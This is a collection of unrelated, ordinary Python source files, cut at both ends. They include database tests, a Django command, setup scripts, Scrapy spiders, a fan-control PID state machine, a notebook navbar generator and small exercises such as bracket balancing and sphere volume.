    helper = CouchDBHelper(DB_NAME, username, password, url=url)
    helper.connect()
    loaded = Config(helper.load("test_doc")).build()
    assert loaded.name == "test"
    assert loaded.description == "Some text"
    assert loaded.train['batch_size'] == 128
    helper.disconnect()
def test_update_config_file(username, password, url):
    """An existing document can be modified and saved with overwrite=True."""
    db_helper = CouchDBHelper(DB_NAME, username, password, url=url)
    db_helper.connect()
    data = db_helper.load("test_doc")
    conf = Config(data)
    c = conf.build()
    assert c.name == "test"
    assert c.description == "Some text"
    assert c.train['batch_size'] == 128
    conf['train']['batch_size'] = 999
    db_helper.save("test_doc", conf, overwrite=True)
    payload = db_helper.load("test_doc")
    assert payload['train']['batch_size'] == 999
    # Close the connection like the other tests do (originally leaked).
    db_helper.disconnect()
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (c) 2010-2015, Ryan Fan <reg_info@126.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
from distutils.version import LooseVersion
import django
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from web.core.management.commands._params import WXMPParams
LEGACY_MODE = LooseVersion(django.get_version()) < LooseVersion("1.8")
WXMP_CONFIG_FILE = "wxconfig.py"
class WXMPConfig(object):
    """Holds the Weixin public-account configuration and writes it to disk."""
    def __init__(self, top_dir):
        # Directory the config file will be written into.
        self.top_dir = top_dir
        self.filename = WXMP_CONFIG_FILE
        # Parameter collector/serializer (see _params.WXMPParams).
        self.params = WXMPParams(self)
    def proceed(self):
        """Collect configuration values (delegates to WXMPParams.get_inputs)."""
        self.params.get_inputs()
    def save(self):
        """Persist the collected parameters (delegates to WXMPParams.save)."""
        self.params.save()
class Command(BaseCommand):
    """
    Management command that configures a Weixin public account.
    For Django < 1.8 additional options go through ``option_list``;
    for Django >= 1.8 they are added in ``add_arguments()``.
    """
    help = "Configure Weixin public account"
    args = '[optional destination directory]'
    if LEGACY_MODE:
        from optparse import make_option
        option_list = BaseCommand.option_list + (
            #make_option(),
        )
    # only useful for Django version >= 1.8
    def add_arguments(self, parser):
        # Positional arguments
        # parser.add_argument('id', nargs='+', type=int)
        # Named (optional) arguments
        # NOTE(review): '-h'/'--help' collide with argparse's built-in help
        # option; on Django >= 1.8 this likely raises argparse.ArgumentError
        # unless the default help action was removed — confirm against the
        # Django version actually in use.
        parser.add_argument(
            '-h',
            '--help',
            action='store_true',
            dest='help_config',
            default=False,
            help='Help how to configure Weixin public account'
        )
    def validate_top_dir(self, top_dir):
        """
        Try to locate where is the WXMP app's dir.
        Raises CommandError when the directory is missing or not writable.
        """
        if not os.path.exists(top_dir):
            raise CommandError("Target directory '%s' does not exist,"
                               "please create it: django-admin.py startapp wxmp_bak." % top_dir)
        if not os.access(top_dir, os.W_OK|os.X_OK):
            raise CommandError("Target directory '%s' must writable by current user,"
                               "please correct permission." % top_dir)
    def handle(self, dir=None, **options):
        # `dir` (shadowing the builtin) is the optional destination directory;
        # kept as-is because Django passes it positionally/by name.
        if dir is None:
            top_dir = os.getcwd()
        else:
            top_dir = os.path.abspath(os.path.expanduser(dir))
        self.validate_top_dir(top_dir)
        config = WXMPConfig(top_dir)
        config.proceed()
        config.save()
        self.stdout.write("")
        self.stdout.write("Successfully save wxmp_bak config file:{0}".format(os.path.join(top_dir, WXMP_CONFIG_FILE)))
        self.stdout.write("You need put it under '<consumer dir>/wxmp_bak/' subdirectory.")
|
import os
import re
from setuptools import setup
# setup.py body for the treewalker package.
# The original assigned to the module attribute `__name__`, which shadows the
# real module name and breaks any `if __name__ == '__main__'` logic; a plain
# constant carries the same value without that side effect.
PACKAGE_NAME = 'treewalker'
project_urls = {
    'Home page': 'https://pypi.org/project/treewalker',
    'Source Code': 'https://github.com/jaapvandervelde/treewalker',
    'Documentation': 'https://treewalker.readthedocs.io/'
}
version_fn = os.path.join(PACKAGE_NAME, "_version.py")
__version__ = "unknown"
try:
    # Context manager fixes the file handle leaked by the bare open().read().
    with open(version_fn, "rt") as version_file:
        version_line = version_file.read()
except EnvironmentError:
    pass  # no version file
else:
    version_regex = r"^__version__ = ['\"]([^'\"]*)['\"]"
    m = re.search(version_regex, version_line, re.M)
    if m:
        __version__ = m.group(1)
    else:
        print('unable to find version in {}'.format(version_fn))
        raise RuntimeError('If {} exists, it is required to be well-formed'.format(version_fn))
with open("README.md", "r") as rm:
    long_description = rm.read()
setup(
    name=PACKAGE_NAME,
    packages=['treewalker'],
    version=__version__,
    license='MIT',
    description='A simple package to walk a directory tree and collect files and sizes into a SQLite DB.',
    # long description will be the contents of project/README.md
    long_description=long_description,
    long_description_content_type='text/markdown',
    author='BMT Commercial Australia Pty Ltd, Jaap van der Velde',
    author_email='jaap.vandervelde@bmtglobal.com',
    url='https://gitlab.com/bmt-aus/tool/treewalker.git',
    project_urls=project_urls,
    # TODO: update keywords
    keywords=['system', 'tool', 'database'],
    install_requires=['conffu==2.2.16', 'scandir', 'typing'],
    extras_require={
        'dev': [
            'mkdocs',
            'pymdown-extensions'
        ]
    },
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.4',
    ],
    entry_points={
        'console_scripts': ['treewalker=treewalker.treewalker:cli_entry_point'],
    }
)
|
# -*- coding: utf-8 -*-
from collections import Counter
from typing import List
class Solution:
    def countStudents(self, students: List[int], sandwiches: List[int]) -> int:
        """Return how many students end up without lunch (LeetCode 1700).

        Because students just cycle the queue until someone wants the top
        sandwich, only the preference counts matter: serve sandwiches in
        stack order until the next one has no takers.
        """
        remaining = Counter(students)
        for preference in sandwiches:
            if not remaining[preference]:
                # Nobody left wants this sandwich; everyone behind is stuck.
                break
            remaining[preference] -= 1
        return sum(remaining.values())
if __name__ == '__main__':
    # Smoke tests using the LeetCode 1700 examples.
    solver = Solution()
    assert solver.countStudents([1, 1, 0, 0], [0, 1, 0, 1]) == 0
    assert solver.countStudents([1, 1, 1, 0, 0, 1], [1, 0, 0, 0, 1, 1]) == 3
|
import os
import shutil
from pathlib import Path
class FileManager:
    """Helpers for creating, renaming, deleting and backing up files/folders.

    Names containing any character in ``symbols`` are rejected because they
    are not valid in Windows file names. Fixes over the original: boolean
    return annotations were wrong (``-> None``), ``createfolder`` never
    returned True on success, ``rename`` returned None (instead of False)
    when the target existed, and a bare ``except`` was narrowed to OSError.
    """
    def __init__(self):
        # Destination directory for backup(); empty string means "not configured".
        self.backup_path = ""
        # Characters that are illegal in Windows file/folder names.
        self.symbols = "?><\\/:*|"
    def set_backup_path(self, path: str) -> None:
        self.backup_path = path
    def get_backup_path(self) -> str:
        return self.backup_path
    def createfile(self, path: str) -> bool:
        """Create an empty file; False if the name contains an illegal character."""
        filename = os.path.split(path)[1]
        if any(sym in filename for sym in self.symbols):
            return False
        Path(path).touch()
        return True
    def createfolder(self, path: str) -> bool:
        """Create a folder; False for illegal names, True on success.

        The original returned None on success, making success and a rejected
        name indistinguishable to callers.
        """
        foldername = os.path.split(path)[1]
        if any(sym in foldername for sym in self.symbols):
            return False
        os.mkdir(path)
        return True
    def rename(self, new_name: str, filepath: str) -> bool:
        """Rename ``filepath`` to ``new_name`` within the same directory.

        Returns False for illegal names, an already-existing target, or an
        OS-level failure.
        """
        if any(sym in new_name for sym in self.symbols):
            return False
        prefix = os.path.split(filepath)[0]
        new_filepath = os.path.join(prefix, new_name)
        if os.path.isfile(new_filepath):
            # Refuse to overwrite an existing file (originally returned None).
            return False
        try:
            os.rename(filepath, new_filepath)
            return True
        except OSError:  # narrowed from a bare except
            print("PermissionError")
            return False
    def delete(self, path: str) -> bool:
        """Delete a file, or recursively remove a directory."""
        try:
            if os.path.isfile(path):
                os.remove(path)
            else:
                shutil.rmtree(path)
            return True
        except PermissionError:
            return False
    def backup(self, path: str) -> bool:
        """Copy a file or directory tree into the configured backup directory.

        Returns False when no backup path is configured, when a directory
        backup already exists at the destination, or on PermissionError.
        """
        # No backup path has been configured.
        if self.backup_path == "":
            return False
        if os.path.isfile(path):
            try:
                shutil.copy(path, self.backup_path)
            except PermissionError:
                return False
        else:
            new_path = os.path.join(self.backup_path, os.path.basename(path))
            try:
                if os.path.exists(new_path):
                    return False
                shutil.copytree(path, new_path)
            except PermissionError:
                return False
        return True
|
import scrapy
from ..items import NewsScrapeItem
import re
class SanookSpider(scrapy.Spider):
    """Scrape news articles from sanook.com into NewsScrapeItem objects."""
    name = "sanook"
    def start_requests(self):
        # Entry point: the news landing page.
        yield scrapy.Request(url='https://www.sanook.com/news/', callback=self.parse)
    def parse(self, response):
        """Follow every article link found on the listing page."""
        for href in response.css('.col-lg-4 .text-color-news a::attr(href)').extract():
            # Links are protocol-relative; prepend the scheme.
            yield scrapy.Request(url='https:' + href, callback=self.parse_news)
    def parse_news(self, response):
        """Extract one news article into an item."""
        item = NewsScrapeItem()
        item['body'] = response.css('strong::text , #EntryReader_0 p::text').extract()
        item['date'] = response.css('time.jsx-2376132709::text').extract_first()
        item['head'] = response.css('.jsx-2761676397.title::text').extract_first()
        item['img'] = response.css('.jsx-2954975791').xpath('img/@src').extract_first()
        item['category'] = response.css('.jsx-2080913917.text-color-news::text').extract_first()
        yield item
#%% |
from . import config_params
from . import thermometer
from . import harddrive
from . import util
import collections
import logging
import time
logger = logging.getLogger(__name__)
class Fan(config_params.Configurable):
    """PID-driven controller for a single fan.

    Implements a small state machine: "running" (PWM follows the PID
    controller), "spinup" (temporarily boosted PWM to overcome static
    friction), "settle" (held at minimum PWM waiting to stop) and "stopped".

    Fixes over the original: logger.warning used "{}" placeholders with lazy
    %-style arguments (the message was never interpolated), `clamped_pwm` was
    assigned twice on one line, `_last_rpm` was never updated so the glitch
    fallback always used 0, and a loop variable shadowed the `thermometer`
    module.
    """
    _params = [
        ("name", None, "Name that will appear in status output."),
        ("min_pwm", 80, "Initial value for minimal allowed nonzero PWM value. Below this the fan will stay on minimum in settle mode and then stop when the settle timeout runs out. This value will be modified to track the actual fan limits."),
        ("spinup_pwm", 128, "Minimal pwm settings to overcome static friction in the fan."),
        ("spinup_time", 10, "How long to keep the spinup pwm for start."),
        ("min_settle_time", 30, "Minimal number of seconds at minimum pwm before stopping the fan."),
        ("max_settle_time", 12 * 60 * 60, "Maximal number of seconds at minimum pwm before stopping the fan."),
        ("pid", config_params.InstanceOf([util.Pid], Exception), "PID controller for this fan."),
        ("thermometers", config_params.ListOf([thermometer.SystemThermometer,
                                               harddrive.Harddrive,
                                               thermometer.MockThermometer]), ""),
        ("fan_max_rpm_sanity_check", 0, "Fan speed larger than this value are considered as a glitch reading and ignored. Value of 0 means to not check the range."),
    ]
    def __init__(self, parent, params):
        self.process_params(params)
        self._state = "running"
        self._spinup_timer = util.TimeoutHelper(self.spinup_time)
        self._settle_timer = util.TimeoutHelper(self.min_settle_time)
        self._min_pwm_helper = _MinPowerHelper(self.min_pwm, 1, parent.min_rpm_probe_interval)
        self._last_pwm = None
        # Run at full power until the first update() computes a real value.
        self.set_pwm_checked(255)
        self._last_rpm = 0
        # `t`, not `thermometer`, to avoid shadowing the imported module.
        duplicate_thermometer_names = util.duplicates(t.name for t in self.thermometers)
        if duplicate_thermometer_names:
            raise ValueError("Duplicate thermometer names: {}".format(", ".join(duplicate_thermometer_names)))
    def get_rpm(self):
        """ Read rpm of the fan. Needs to be overridden. """
        raise NotImplementedError()
    def set_pwm(self, pwm):
        """ Set the PWM input the fan. Needs to be overridden. """
        raise NotImplementedError()
    def set_pwm_checked(self, pwm):
        """ Wrapped set_pwm, deduplicates and logs speed changes """
        pwm = int(pwm)
        if pwm > 255:
            pwm = 255
        if pwm == self._last_pwm:
            return
        logger.debug("Setting {} to {}".format(self.name, self._pwm_to_percent(pwm)))
        self.set_pwm(pwm)
        self._last_pwm = pwm
    @staticmethod
    def _pwm_to_percent(pwm):
        """Format a 0-255 PWM value as an integer percentage string."""
        return str((100 * pwm) // 255) + "%"
    def _change_state(self, state):
        """ Change state and log it """
        self._state = state
        logger.debug("Changing state of {} to {}".format(self.name, state))
    def update(self, dt):
        """ This is where the internal state machine is implemented """
        new_dt = float("inf")
        status_block = {}
        rpm = self.get_rpm()
        if self.fan_max_rpm_sanity_check != 0 and rpm > self.fan_max_rpm_sanity_check:
            # %-style placeholders: the logging module interpolates lazy args
            # with %, so the original "{}" placeholders were never substituted.
            logger.warning("Detected glitch speed reading of %s (%s), using last value of %s instead.",
                           self.name, rpm, self._last_rpm)
            rpm = self._last_rpm
        else:
            logger.debug("Speed of {} is {} rpm".format(self.name, rpm))
            # Remember the last accepted reading for the glitch fallback above
            # (the original never updated this and always fell back to 0).
            self._last_rpm = rpm
        status_block["rpm"] = rpm
        thermometers_status = {}
        for t in self.thermometers:
            thermometers_status[t.name] = t.update(dt)
        status_block["thermometers"] = thermometers_status
        errors = [t.get_normalized_temperature_error()
                  for t in self.thermometers]
        max_error = max(errors)
        pwm, max_derivative = self.pid.update(errors, dt)
        # (the original duplicated this assignment: `clamped_pwm = clamped_pwm = ...`)
        clamped_pwm = util.clamp(pwm, self._min_pwm_helper.value, 255)
        if rpm == 0 and self._state in ("running", "settle"):
            # Fan should be spinning but is not: raise the minimum PWM estimate
            # and force a spinup.
            self._spinup(clamped_pwm)
            self._min_pwm_helper.failed()
            logger.info("%s not spinning when it should, increasing min PWM to %s",
                        self.name,
                        self._pwm_to_percent(self._min_pwm_helper.value))
        elif self._state in ("running", "spinup"):
            if self._state == "spinup":
                if self._spinup_timer(dt):
                    self._change_state("running")
                else:
                    new_dt = min(new_dt, self._spinup_timer.remaining_time)
                    clamped_pwm = max(clamped_pwm, self.spinup_pwm)
            self.set_pwm_checked(clamped_pwm)
            if max_error < 0 and clamped_pwm <= self._min_pwm_helper.value:
                # Cool enough and already at the minimum: wait before stopping.
                self._settle_timer.reset()
                self._change_state("settle")
                logger.debug("Settle time for {} is {}s".format(self.name, self._settle_timer.limit))
        elif self._state == "settle":
            if max_error > 0 or clamped_pwm > self._min_pwm_helper.value:
                self.set_pwm_checked(clamped_pwm)
                self._change_state("running")
            elif self._settle_timer(dt):
                self.set_pwm_checked(0)
                self._change_state("stopped")
            else:
                self._min_pwm_helper.update(dt)
                self.set_pwm_checked(self._min_pwm_helper.value)
        elif self._state == "stopped":
            self.pid.reset_accumulator()
            if max_error > 0:
                self._spinup(clamped_pwm)
                # Increase settle timer when spinning up, to avoid periodic spinups and spin downs
                # due to minimum allowed fan RPM being too much for the required temperature
                self._settle_timer.limit = min(self._settle_timer.limit * 2,
                                               self.max_settle_time)
            elif max_derivative <= 0:
                # If the derivative is not increasing, then we are in steady state and we start
                # decreasing settle timer
                self._settle_timer.limit = max(self._settle_timer.limit - dt,
                                               self.min_settle_time)
        else:
            raise Exception("Unknown state " + self._state)
        status_block["pid"] = {"error": max_error, "derivative": 60*max_derivative, "integrator": self.pid._integrator/60} # Derivative is in degrees / minute, integrator in minutes
        status_block["min_pwm"] = self._min_pwm_helper.value
        status_block["settle_timeout"] = self._settle_timer.limit
        return new_dt, status_block
    def _spinup(self, pwm):
        """Boost PWM to overcome static friction and enter the spinup state."""
        self.set_pwm_checked(max(pwm, self.spinup_pwm))
        self._change_state("spinup")
        self._spinup_timer.reset()
class SystemFan(Fan, config_params.Configurable):
    """Fan driven through the Linux hwmon sysfs interface."""
    _params = [
        ("pwm_path", None, "Path in (typically /sys/class/hwmon/hwmon?/pwm?) that is used to set fan pwm setting"),
        ("rpm_path", None, "Path in (typically /sys/class/hwmon/hwmon?/fan?_input) that is used to set rpm"),
    ]
    def __init__(self, parent, params):
        super().__init__(parent, params)
        # `name` defaults to None (see Fan._params); the original
        # `len(self.name)` raised TypeError in that case.
        if not self.name:
            self.name = self.get_automatic_name()
    def get_rpm(self):
        """Read the current fan speed from sysfs."""
        with open(self.rpm_path, "r") as fp:
            return int(fp.readline())
    def set_pwm(self, value):
        """Write a PWM value (0-255) to sysfs."""
        with open(self.pwm_path, "w") as fp:
            print(str(value), file=fp)
class MockFan(Fan, config_params.Configurable):
    """Fake fan for testing: reports a fixed RPM and ignores PWM writes."""
    _params = [
        ("name", None, "Name that will appear in status output."),
        ("rpm", 1234, "RPM shown."),
    ]
    def get_rpm(self):
        # Constant value taken from configuration.
        return self.rpm
    def set_pwm(self, value):
        # No hardware to drive.
        pass
class _MinPowerHelper:
    """ Helper state machine that tracks the minimum allowed PWM input of a fan. """
    def __init__(self, initial_value, step, probe_interval):
        self.value = initial_value  # current estimate of the minimal usable PWM
        self._step = step  # adjustment applied per probe/failure
        self._probe_timeout = util.TimeoutHelper(probe_interval)
        self._probing = True  # whether we are actively probing downwards
    def update(self, dt):
        """Lower the estimate while probing; resume probing after the timeout."""
        if not self._probing and self._probe_timeout(dt):
            self._probing = True
        if self._probing:
            self.value -= self._step
        return self.value
    def failed(self):
        """The fan stalled at the current value: back off and pause probing."""
        self.value += self._step
        self._probing = False
        self._probe_timeout.reset()
|
#!/usr/bin/env python3
import os
import itertools
import sys
import re
from ipykernel import kernelspec as ks
import nbformat
from nbformat.v4.nbbase import new_markdown_cell
#from generate_contents import NOTEBOOK_DIR, REG, iter_notebooks, get_notebook_title
#NOTEBOOK_DIR = os.path.join(os.path.dirname(__file__), '..', 'notebooks')
NOTEBOOK_DIR = os.path.join(os.path.dirname(__file__))
def prev_this_next(it):
    """Yield (previous, current, next) triples over *it*.

    The first triple has previous=None, the last has next=None.
    """
    prevs, currents, nexts = itertools.tee(it, 3)
    next(nexts)  # shift the "next" stream one element ahead
    return zip(itertools.chain([None], prevs),
               currents,
               itertools.chain(nexts, [None]))
PREV_TEMPLATE = "< [{title}]({url}) "
CONTENTS = "| [Contents](Index.ipynb) |"
NEXT_TEMPLATE = " [{title}]({url}) >"
NAV_COMMENT = "<!--NAVIGATION-->\n"
COLAB_LINK = """
<a href="https://colab.research.google.com/github/csmastersUH/data_analysis_with_python_2020/blob/master/{notebook_filename}"><img align="left" src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab" title="Open and Execute in Google Colaboratory"></a>
"""
def iter_notebooks():
    """Notebook filenames are supplied as command-line arguments."""
    return list(sys.argv[1:])
def iter_navbars():
    """Yield (notebook_path, navbar_markdown) for each notebook on the command line.

    Prev/contents/next links are currently disabled; the navbar consists of
    the navigation comment marker followed by a Colab badge link.
    """
    for _prev_nb, nb, _next_nb in prev_this_next(iter_notebooks()):
        navbar = NAV_COMMENT + COLAB_LINK.format(notebook_filename=os.path.basename(nb))
        yield os.path.join(NOTEBOOK_DIR, nb), navbar
def get_notebook_exercises(nb):
    """Return exercise names found in the notebook's non-code cells.

    An exercise cell starts with the alert-div heading marker; the name is
    the text between the first '>' and the last '<' of the cell source.
    """
    marker = '#### <div class="alert alert-info">'
    names = []
    for cell in nb.cells:
        if cell.cell_type != "code" and cell.source.startswith(marker):
            names.append(re.search(r">(.*)<", cell.source).group(1))
    return names
def to_nbsphinx(s):
    """Use the sphinx naming style for anchors of headings."""
    lowered = s.replace(" ", "-").lower()
    return "".join(c for c in lowered if c not in "()")
def to_github(s):
    """Use the github naming style for anchors of headings"""
    s = s.replace(" ", "-")
    # NOTE(review): this substitution replaces a trailing ")" with ")" — a
    # no-op. The trailing comment suggests the intent was to strip or escape
    # a closing parenthesis at the end of the anchor; confirm the intended
    # replacement before changing it.
    s = re.sub(r"\)$", ")", s) # In notebook the link cannot end in closing parenthesis
    return s
def write_navbars():
    """Insert or refresh the navigation cell of each notebook in-place.

    For every notebook passed on the command line: build a navbar (Colab
    badge) plus, when the notebook contains exercises, a markdown table of
    links to them; then prepend/replace the first cell and append/replace the
    last cell with that content and write the notebook back.
    """
    for nb_name, navbar in iter_navbars():
        nb = nbformat.read(nb_name, as_version=4)
        nb_file = os.path.basename(nb_name)
        # A cell previously written by this script starts with NAV_COMMENT.
        is_comment = lambda cell: cell.source.startswith(NAV_COMMENT)
        exercises = get_notebook_exercises(nb)
        n = len(exercises)
        if n > 0:
            exercise_links = [ "[%s](<#%s>)" % (e, to_github(e)) for e in exercises ]
            longest_field = max(len(e) for e in exercise_links)
            print(exercise_links)
            print("%i exercises" % n)
            # Lay the links out as a markdown table with up to 3 columns.
            columns = 3
            if n < columns:
                columns = n
            table = []
            empty=" " * (longest_field + 2)
            column_title = "-".center(longest_field + 2)
            dash="-" * (longest_field + 2)
            table.append("|%s\n" % (("%s|" % column_title)*columns)) # No column title
            table.append("|%s\n" % (("%s|" % dash)*columns)) # separator line
            for i, e in enumerate(exercise_links):
                if i % columns == 0: # Start a new row
                    table.append("|")
                table.append(" %s |" % e.center(longest_field))
                if i % columns == (columns-1): # Row is full
                    table.append("\n")
            # Pad the last row with empty cells if it is not full.
            remainder = n % columns
            if remainder > 0:
                table.append("%s\n" % (("%s|" % empty)* (columns - remainder)))
            table = "".join(table)
            print(table)
            header = "%s\n%s\n" % (navbar, table)
        else:
            header = "%s\n" % (navbar) # no exercises
        # Replace an existing generated first cell, otherwise insert one.
        if is_comment(nb.cells[0]):
            print("- amending navbar for {0}".format(nb_file))
            nb.cells[0].source = header
        else:
            print("- inserting navbar for {0}".format(nb_file))
            nb.cells.insert(0, new_markdown_cell(source=header))
        # Same for the trailing navbar cell (navbar only, no table).
        if is_comment(nb.cells[-1]):
            nb.cells[-1].source = navbar
        else:
            nb.cells.append(new_markdown_cell(source=navbar))
        nbformat.write(nb, nb_name)
if __name__ == '__main__':
    # Notebook filenames are taken from sys.argv (see iter_notebooks).
    write_navbars()
|
import unittest
from aula4.pilha import Pilha, PilhaVaziaErro
def esta_balanceada(expressao):
    """Check whether parentheses, brackets and braces in *expressao* are balanced.

    Non-bracket characters are ignored. Time and space complexity: O(n).
    Uses only the Pilha (stack) built in the previous class.

    Fixes the original implementation, which popped the stack for *every*
    non-opening character, so e.g. 'a(' was wrongly reported as balanced.

    :param expressao: string with the expression to check
    :return: True if the expression is balanced, False otherwise
    """
    abre_de = {')': '(', ']': '[', '}': '{'}
    pilha = Pilha()
    for caracter in expressao:
        if caracter in '({[':
            pilha.empilhar(caracter)
        elif caracter in ')}]':
            try:
                if pilha.desempilhar() != abre_de[caracter]:
                    return False
            except PilhaVaziaErro:
                # Closing bracket with nothing open.
                return False
    return pilha.vazia()
class BalancearTestes(unittest.TestCase):
    """Unit tests for esta_balanceada covering empty input, each bracket type,
    nesting, missing openers/closers and mismatched pairs."""
    def test_expressao_vazia(self):
        self.assertTrue(esta_balanceada(''))
    def test_parenteses(self):
        self.assertTrue(esta_balanceada('()'))
    def test_chaves(self):
        self.assertTrue(esta_balanceada('{}'))
    def test_colchetes(self):
        self.assertTrue(esta_balanceada('[]'))
    def test_todos_caracteres(self):
        self.assertTrue(esta_balanceada('({[]})'))
        self.assertTrue(esta_balanceada('[({})]'))
        self.assertTrue(esta_balanceada('{[()]}'))
    def test_chave_nao_fechada(self):
        self.assertFalse(esta_balanceada('{'))
    def test_colchete_nao_fechado(self):
        self.assertFalse(esta_balanceada('['))
    def test_parentese_nao_fechado(self):
        self.assertFalse(esta_balanceada('('))
    def test_chave_nao_aberta(self):
        self.assertFalse(esta_balanceada('}{'))
    def test_colchete_nao_aberto(self):
        self.assertFalse(esta_balanceada(']['))
    def test_parentese_nao_aberto(self):
        self.assertFalse(esta_balanceada(')('))
    def test_falta_de_caracter_de_fechamento(self):
        self.assertFalse(esta_balanceada('({[]}'))
    def test_falta_de_caracter_de_abertura(self):
        self.assertFalse(esta_balanceada('({]})'))
    def test_expressao_matematica_valida(self):
        self.assertTrue(esta_balanceada('({[1+3]*5}/7)+9'))
    def test_char_errado_fechando(self):
        self.assertFalse(esta_balanceada('[)'))
# -*- coding: utf-8 -*-
import datetime
import re
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
DAY_MAPPING = {
"Monday": "Mo",
"Tuesday": "Tu",
"Wednesday": "We",
"Thursday": "Th",
"Friday": "Fr",
"Saturday": "Sa",
"Sunday": "Su",
}
class EinsteinBrosSpider(scrapy.Spider):
    """Scrape Einstein Bros. Bagels store locations into GeojsonPointItems."""
    download_delay = 0.5
    name = "einsteinbros"
    item_attributes = {"brand": "Einstein Bros. Bagels"}
    allowed_domains = ["einsteinbros.com"]
    start_urls = ("https://locations.einsteinbros.com/us",)
    def parse_hours(self, elements):
        """Build an opening-hours string from the hours table rows."""
        opening_hours = OpeningHours()
        for elem in elements:
            day = elem.xpath(
                './/td[@class="c-location-hours-details-row-day"]/text()'
            ).extract_first()
            intervals = elem.xpath(
                './/td[@class="c-location-hours-details-row-intervals"]'
            )
            if intervals.xpath("./text()").extract_first() == "Closed":
                continue
            if intervals.xpath("./span/text()").extract_first() == "Open 24 hours":
                opening_hours.add_range(
                    day=DAY_MAPPING[day], open_time="0:00", close_time="23:59"
                )
            else:
                start_time = elem.xpath(
                    './/span[@class="c-location-hours-details-row-intervals-instance-open"]/text()'
                ).extract_first()
                end_time = elem.xpath(
                    './/span[@class="c-location-hours-details-row-intervals-instance-close"]/text()'
                ).extract_first()
                # Times carry an AM/PM suffix, i.e. they are 12-hour values.
                # The original used "%H" (24-hour), which makes strptime
                # ignore "%p" entirely, so PM times were parsed as AM.
                # "%I" is the correct 12-hour directive.
                opening_hours.add_range(
                    day=DAY_MAPPING[day],
                    open_time=datetime.datetime.strptime(
                        start_time, "%I:%M %p"
                    ).strftime("%H:%M"),
                    close_time=datetime.datetime.strptime(
                        end_time, "%I:%M %p"
                    ).strftime("%H:%M"),
                )
        return opening_hours.as_opening_hours()
    def parse_store(self, response):
        """Extract one store page into a GeojsonPointItem."""
        # The last URL path segment uniquely identifies the store.
        ref = re.search(r".+/(.+)$", response.url).group(1)
        address1 = response.xpath(
            '//span[@class="c-address-street-1"]/text()'
        ).extract_first()
        address2 = (
            response.xpath('//span[@class="c-address-street-2"]/text()').extract_first()
            or ""
        )
        properties = {
            "addr_full": " ".join([address1, address2]).strip(),
            "phone": response.xpath(
                '//span[@itemprop="telephone"]/text()'
            ).extract_first(),
            "city": response.xpath(
                '//span[@class="c-address-city"]/text()'
            ).extract_first(),
            "state": response.xpath(
                '//span[@itemprop="addressRegion"]/text()'
            ).extract_first(),
            "postcode": response.xpath(
                '//span[@itemprop="postalCode"]/text()'
            ).extract_first(),
            "country": response.xpath(
                '//abbr[@itemprop="addressCountry"]/text()'
            ).extract_first(),
            "ref": ref,
            "website": response.url,
            "lat": float(
                response.xpath('//meta[@itemprop="latitude"]/@content').extract_first()
            ),
            "lon": float(
                response.xpath('//meta[@itemprop="longitude"]/@content').extract_first()
            ),
            "name": response.xpath('//h1[@id="location-name"]/text()').extract_first(),
        }
        hours = self.parse_hours(
            response.xpath('//table[@class="c-location-hours-details"]//tbody/tr')
        )
        if hours:
            properties["opening_hours"] = hours
        yield GeojsonPointItem(**properties)
    def parse(self, response):
        """Walk the state/city directory pages down to individual stores."""
        urls = response.xpath('//a[@class="Directory-listLink"]/@href').extract()
        is_store_list = response.xpath(
            '//section[contains(@class,"LocationList")]'
        ).extract()
        if not urls and is_store_list:
            urls = response.xpath(
                '//a[contains(@class,"Teaser-titleLink")]/@href'
            ).extract()
        for url in urls:
            # Store pages look like us/<state>/<city>/<street>.
            if re.search(r"us/.{2}/.+/.+", url):
                yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
            else:
                yield scrapy.Request(response.urljoin(url))
|
# 1 - The volume of a sphere with radius r is 4/3 πr**3. What is the volume of a sphere with radius 5?
# V = 4 * pi * r**3 / 3
import math
radius = 5
# Apply the sphere volume formula (same operation order as before, so the
# floating point result is identical).
volume_sphere = 4 * math.pi * (radius ** 3) / 3
print('The volume is {:.2f}.'.format(volume_sphere))
|
from io import open
from setuptools import find_packages, setup
# Runtime dependencies are maintained in requirements.txt.
with open('requirements.txt') as fp:
    install_requires = fp.read()
# Read the long description through a context manager so the file handle is
# closed deterministically (the original bare open().read() leaked it).
with open('README.md', 'r', encoding='utf-8') as readme:
    long_description = readme.read()
setup(
    name='modstool',
    author='Mike Gerber, The QURATOR SPK Team',
    author_email='mike.gerber@sbb.spk-berlin.de, qurator@sbb.spk-berlin.de',
    description='Convert MODS metadata to a pandas DataFrame',
    long_description=long_description,
    long_description_content_type='text/markdown',
    keywords='qurator mets mods library',
    license='Apache',
    namespace_packages=['qurator'],
    packages=find_packages(exclude=['*.tests', '*.tests.*', 'tests.*', 'tests']),
    install_requires=install_requires,
    entry_points={
        'console_scripts': [
            'modstool=qurator.modstool.modstool:main',
        ]
    },
    python_requires='>=3.0.0',
    tests_require=['pytest'],
)
|
from datetime import timedelta
import pytest
from django.urls import reverse
from django.utils.timezone import localtime
@pytest.mark.django_db
def test_rest_api_autor_detail(client, autor):
    """The author detail endpoint responds with HTTP 200."""
    response = client.get(reverse("api_v1:autor-detail", args=(autor.pk,)))
    assert response.status_code == 200
@pytest.mark.django_db
def test_rest_api_autor_list(client, autor):
    """The author list endpoint responds with HTTP 200."""
